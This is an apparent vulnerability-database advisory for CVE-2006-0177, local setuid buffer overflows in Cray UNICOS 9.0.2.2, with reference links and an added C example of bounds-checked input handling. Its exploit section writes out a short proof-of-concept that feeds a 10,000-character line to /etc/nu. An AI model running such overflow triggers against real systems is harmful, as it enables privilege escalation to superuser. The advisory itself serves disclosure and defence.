Cray UNICOS Buffer Overflow Vulnerability

Vulnerability ID: 1109613
Vulnerability type: Buffer overflow
Published: 2006-01-10
Updated: 2006-01-16
CVE ID: CVE-2006-0177
CNNVD-ID: CNNVD-200601-114
Platform: Linux
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/27066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200601-114
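|Vulnerability details
Multiple buffer overflows exist in Cray UNICOS 9.0.2.2. A local user can gain privileges by (1) invoking /usr/bin/script with a long command-line argument, or (2) setting the -c option of /etc/nu to the name of a file that contains a long line.
|Exploit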
source: http://www.securityfocus.com/bid/16205/info
 
Cray UNICOS is prone to locally exploitable buffer overflow vulnerabilities. These issues are due to insufficient bounds checking of command line parameters in various utilities with setuid-superuser privileges.
 
Successful exploitation could result in execution of malicious machine code with superuser privileges, facilitating the complete compromise of affected computers.
 
These issues are reported in version 9.0.2.2 of UNICOS; other versions may also be affected. 

for '/etc/nu':
echo "" >> /tmp/acid
udbgen -p /tmp
echo `perl -e 'print "A"x10000'` >> /tmp/script
/etc/nu -p /tmp -c /tmp/script -a
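
The missing check described above (bounds checking of a command-line parameter, and of a line read from the file named by -c), as an added C example. It is not UNICOS source code and not part of the advisory; the function names and the 64-byte line buffer are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Copy an argument into a fixed buffer; -1 (nothing copied) if it does not fit. */
int copy_arg_checked(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsize) return -1;      /* no room for the text plus its NUL */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Read one line: 1 = line in buf, 0 = end of file, -1 = rejected.
 * An over-long line is drained and discarded, never partially parsed. */
int read_line_checked(FILE *fp, char *buf, size_t bufsize)
{
    if (bufsize < 2) return -1;
    if (fgets(buf, (int)bufsize, fp) == NULL) return 0;
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    int c = fgetc(fp);                /* no newline yet: look one byte ahead */
    if (c == EOF || c == '\n') return 1;
    while (c != EOF && c != '\n') c = fgetc(fp);
    buf[0] = '\0';
    return -1;
}

/* Count rejected lines in a constructed input, using a 64-byte line buffer
 * (assumed size, for illustration only). */
int count_rejected(const char *text)
{
    char line[64];
    int rc, rejected = 0;
    FILE *fp = tmpfile();
    if (fp == NULL) return -1;
    fputs(text, fp);
    rewind(fp);
    while ((rc = read_line_checked(fp, line, sizeof line)) != 0)
        if (rc < 0) rejected++;
    fclose(fp);
    return rejected;
}

int main(void)
{
    /* Constructed sample input: two short lines, none rejected. */
    printf("rejected: %d\n", count_rejected("constructed\nsample\n"));
    return 0;
}
```

A setuid utility should treat a rejected argument or line as a fatal input error and exit before any further processing.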
|References

Source: BID
Name: 16205
Link: http://www.securityfocus.com/bid/16205
Source: FULLDISC
Name: 20060110 SUID root overflows in UNICOS and partial shellcode
Link: http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0343.html
Source: XF
Name: unicos-command-line-bo(24276)
Link: http://xforce.iss.net/xforce/xfdb/24276